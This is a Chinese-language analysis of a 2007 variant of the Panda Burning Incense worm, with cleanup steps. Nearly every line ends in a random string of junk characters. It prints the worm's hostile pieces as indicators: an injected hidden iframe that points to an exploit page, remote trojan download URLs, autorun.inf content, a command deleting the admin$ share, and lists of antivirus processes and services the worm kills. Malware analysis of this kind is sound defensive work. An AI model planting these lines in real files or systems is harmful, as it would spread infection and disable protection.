熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe < HlS0J9  
^7G@CBi
c"  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） >TK:&V  
]DHB'NOh,  
中文名称：（尼姆亚，熊猫烧香） ,9SBGxK5`  
x\z*iv  
病毒大小：68,570 字节 p%/

Z  
r#M0X^4A  
编写语言：Borland Delphi 6.0 - 7.0 P+tRxpz  
p6VS<L  
加壳方式：FSG 2.0 -> bart/xt VEj-%"\  
4^/MDM@  
发现时间：2007.1.16 Ka%u#};  
X0wvOs:  
危害等级：高 TmZsC5  
`@!4#3H  
一、病毒描述： `!V=~"ve  
2uujA* ^  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 #e|G!'wdj  
Gi]R8?M  
二：中毒现象： o/??w:'  
t@m!k+0  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 Osz:23(p  
F6^Xi"R[  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 lKKg n{R  
1-Jd
Qs6  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 oMey^]!  
m3[R  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> *L7&P46  
xDJ@MW#  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 <vS3[(  
.xG3`YH  
6：不能正常使用任务管理器，SREng.exe等工具。 Lmh4ezrdH  
e x"E50  
7：无故的向外发包，连接局域网中其他机器。 $o}Ao@WkO  
UaA1HZ1  
三：技术分析 &/wd_;d^A  
Lh`B5  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe `_"F7Czn  
55LW[Pc  
建立注册表自启动项: XM?>#^nC?u  
EGJ d:>k  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] T'C^,,if  
tE=;V) %we  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" e"g=A=S  

:xwyE(w  
2：查找反病毒窗体病毒结束相关进程: $>if@}u  
SrVo0$5)  
天网防火墙 ' 5tk0A  
:[P)t %  
virusscan zH)M,+P  
=Pj+^+UM  
symantec antivirus $F&m('aB8  
V7~tIhuJH  
system safety monitor IZ2(F,{o  
kz30! L  
system repair engineer ^\"@r%|  
41^=z[k  
wrapped gift killer z:gp\  
`|rF^~6(dR  
游戏木马检测大师 JJE?!Yvc  
xOY %14%Y  
超级巡警 @}{lp'8FYi  
-6KNMk  
3：结束以下进程: PPpq"c  
qz_'v{uAj  
mcshield.exe ]0dj##5tJ  
!vfbgK  
vstskmgr.exe <y
`MUpf]  
NP#6'eH\  
naprdmgr.exe #OMFv.  
I,8f{T!O@"  
updaterui.exe %noByq,?  
NB^+Hcb$  
tbmon.exe fV(WUN+  
:@~W$f\y  
scan32.exe \>]C  
w!kWG,{C  
ravmond.exe OL%KAEnD  
C0`Bi:Ze  
ccenter.exe N e<D'-  
T1~G{@"  
ravtask.exe KkJrh@lk  
|O';$a1S  
rav.exe ~NV 8avZ  
o'?[6B>oj  
ravmon.exe I%<LLkQ  
qG)M8xk  
ravmond.exe Y#<>N-X|kA  
6"djX47j  
ravstub.exe QW
QJSz5  
(~IoRhp^  
kvxp.kxp [C^&iLX/F*  
ks|c'XQb  
kvmonxp.kxp Rp0`%}2 o  
`
EdZ  
kvcenter.kxp "tF#]iQQ u  
5._1G| 3  
kvsrvxp.exe S HxD(6  
[X"pOz  
kregex.exe AW<"3 !@  
dTrz7ay
H  
uihost.exe 259R5X<V  
DD fw& y  
trojdie.kxp 1=L5=uz1d:  
p>=i'~lQ6  
frogagent.exe q|zips,  
%M5{-pJ|C  
kvxp.kxp zI.%b7wq  
B{tROuN<  
kvmonxp.kxp S&J>15oWM`  
;k:17&:8ue  
kvcenter.kxp [[7=rn}@<  
ty\F~]Oo  
kvsrvxp.exe S;K5JBX0#  
nKnQ%R  
kregex.exe =/e
$Rp  
Ay@/{RZz  
uihost.exe ('z:XW96  
Y(&rlL(sPK  
trojdie.kxp R~"&E#C  
GS&I6  
frogagent.exe {|B 2$1':  
A~
X| vW  
logo1_.exe eb>jT:  
Oq*;GR(Q  
logo_1.exe yu}yON  
9]%2Yb8SC  
rundl132.exe q8!X^1F7  
: "^/?Sd  
taskmgr.exe 7g>|e  
l T#WM]  
msconfig.exe VDFs
.;:s  
<Rfx`mn  
regedit.exe (L*<CV  
#.
{ddY{  
sreng.exe }R!t/8K  
4：禁用下列服务: aTwBRm  
*?pnTQs^  
schedule gsYQ"/S9  
#T=e p0  
sharedaccess Dkg^B@5Xr  
9aBz%* xo  
rsccenter 8ZCR9%  
XS$#\UQ  
rsravmon hkOFPt&  
d&lT/S  
rsccenter
;`h$xB(  
\]0#jI/:  
kvwsc y&V%xE/  
<v!jS=T  
kvsrvxp pVM1%n:#  
+2w<V0V_  
kvwsc {:#c1d2@8  
" {X0&  
kvsrvxp z31g"  
2sj: &][R  
kavsvc Wuk!\<T{  
\opcn\vW  
avp >sZ_I?YDs  
8)>4ZNXz  
avp U]W"  
M/,lP  
kavsvc
"xNP"S  
Z<*"sFpAO  
mcafeeframework NiMsAI@j  
wq|7sk{  
mcshield 2UIZ<#|D>s  
=y>CO:^G%  
mctaskmanager U
02  
+,Or^pO=  
mcafeeframework 3:)_oHq  
Y6T{/!  
mcshield n5#QQk2  
[{>3"XJ'  
mctaskmanager wD/jN:  
gtIEpYN+  
navapsvc ,4=mlte"  
)%<,JD  
wscsvc MdFFt:y:  
CfVL'  
kpfwsvc %{Obhj;c  
~Kl"V%>  
sndsrvc h/2@4XKj  
BSy{"K*M  
ccproxy A%X=yqY  
F'"-aB ~  
ccevtmgr HCx0'|J  
7H|0.  
ccsetmgr Igw2n{})w  
~YenH  
spbbcsvc ]+b?J0|P<  
)L7[;(gQ  
symantec core lc 2jlz#Sk  
[XH,~JZJj  
npfmntor I!}V+gu=  
N<<O(r  
mskservice Anqt:(  
vE1:;%Q  
firesvc VbTX;?  
Dm$SW<!l|  
5：删除下列注册表项: /sn }Q-Zy2  
wp'[AR
}  
software\microsoft\windows\currentversion\run\ravtask g-,lY|a  
gI9nxy  
software\microsoft\windows\currentversion\run\kvmonxp 1]Cbi7  
v;-0^s/P  
software\microsoft\windows\currentversion\run\kav X-Ev>3H  
.JTRFk{W  
software\microsoft\windows\currentversion\run\kavpersonal50 ^uphpABpD  
vbX.0f "n  
software\microsoft\windows\currentversion\run\mcafeeupdaterui P: L6Zo-J  
|eg8F$WU  
software\microsoft\windows\currentversion\run\network associates error reporting service y|i(~  
'4D7:  
software\microsoft\windows\currentversion\run\shstatexe q2OF-.rE  
8G2QI4  
software\microsoft\windows\currentversion\run\ylive.exe M+^ NF\  
"=KFag  
software\microsoft\windows\currentversion\run\yassistse O2yD{i#l*#  
[6 "5  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） YXmy-o>  
{?++T 0  
7：跳过下列目录: /VP #J<6L  
H6>tto  
windows  _VM}]A  
gz uWhQo  
winnt m(dW["8D  
pIug$Ke_%  
systemvolumeinformation |}:q@]dC#  
xRO9o3  
recycled T,Q7 YI  
k2_y84;D  
windowsnt 3q@H8%jcw  
69Z`mR  
windowsupdate j9w{=( MV  
?5;wPDsK  
windowsmediaplayer QNv5CQ&  
AAuwE&Gg  
outlookexpress Im};wJ&
 
BZKg:;9  
netmeeting Fi7~JZZ  
W>c*\)Xk !  
commonfiles u-bgk(u  
:/Z1$xS  
complusapplications k8SY=HP  
/QCg E~  
commonfiles > PL}7f&:  
NXz/1ut%  
messenger "(~fl<;  
3j[<nBsn.  
installshieldinstallationinformation $GQEdVSNo  
ep`8LQf  
msn ;*U&lT  
x>Dix1b:.  
microsoftfrontpage &uV|Ie8@q  
o4j!:CI  
moviemaker \l# H#~  
/}%C'  
msngaminzone e5lJ)_o  
o)CW7Y#?,  
8：删除*.gho备份文件. Uxe]T  
VP?Q$?a  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. {}gL*2:EW$  
C.H(aX)7  
autorun.inf内容： }s#4m  
zxd<C
q>d  
程序代码 Tc/<b2\g  
F4~O-g.<  
[AutoRun] CG J_k?h  
'~z`kah  
OPEN=setup.exe 5nmE*(  
x[BA <UNO  
shellexecute=setup.exe 8u"C7} N_  
;Yg/y  
shell\Auto\command=setup.exe <~svy)Cz  
j~cG#t]  
10：删除共享：cmd.exe /c net share admin$ /del /y N>g6KgX{K  
<iH"5DEe  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 &`-e; Xt  
X)c0y3hk  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 `}}|QP5xG  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 V.yDZ"  
{n<1uh9~$8  
目前下载列表如下：  3L4v@  
NjdDImz.;s  
http://www.krvkr.com/down/cq.exe l~@ -oE  
qV``' _=<  
http://www.krvkr.com/down/mh.exe <BBSC  
YPw=iF]  
http://www.krvkr.com/down/my.exe z}*L*Sk  
Qi9M4Yv  
http://www.krvkr.com/down/wl.exe k4^!"~<+0  
? fM_Y  
http://www.krvkr.com/down/rx.exe :0o]#7  
/>7G  
http://www.krvkr.com/down/wow.exe =#%Vs>G  
92*"3)
  
http://www.krvkr.com/down/zt.exe fCv.$5  
!P
d)  
http://www.krvkr.com/down/wm.exe E-?JHJloU  
_Pl5?5eZj  
http://www.krvkr.com/down/dj.exe gA2]kZg  
VrT0S  
http://www.krvkr.com/cn/iechajian.exe A{DE7gp!
 
G49`
a*Jn  
到此病毒行为分析完毕。 
;`a~9uG  
HLq2avs\  
四：Sec120.Com专家解决方案： S9qc34\^=  
`2HNQiK'@  
1：关闭网络共享，断开网络。 8ROZ]Xh,x  
_o>?\:A  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） i/,IG+4vI  
;PMy9H  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 Y}r UVn  
&>}f\ch/  
4：删除注册表启动项 cA!o xti  
i| *r/  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] -}H EV#ev  
M-C>I;a  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" }SS~uQ;8  
dp'k$el  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe ( D
@U%  
d{]2Q9g  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 :8lqo%5  
e:|Bn>*  
7：如果电脑上有脚本文件，将病毒代码全部删除。 lfLLk?g3k  
(;++a9GK  
8：关闭系统的自动播放功能。 73+)> "x>  
v)v`896S`  
这样就基本上将病毒清除了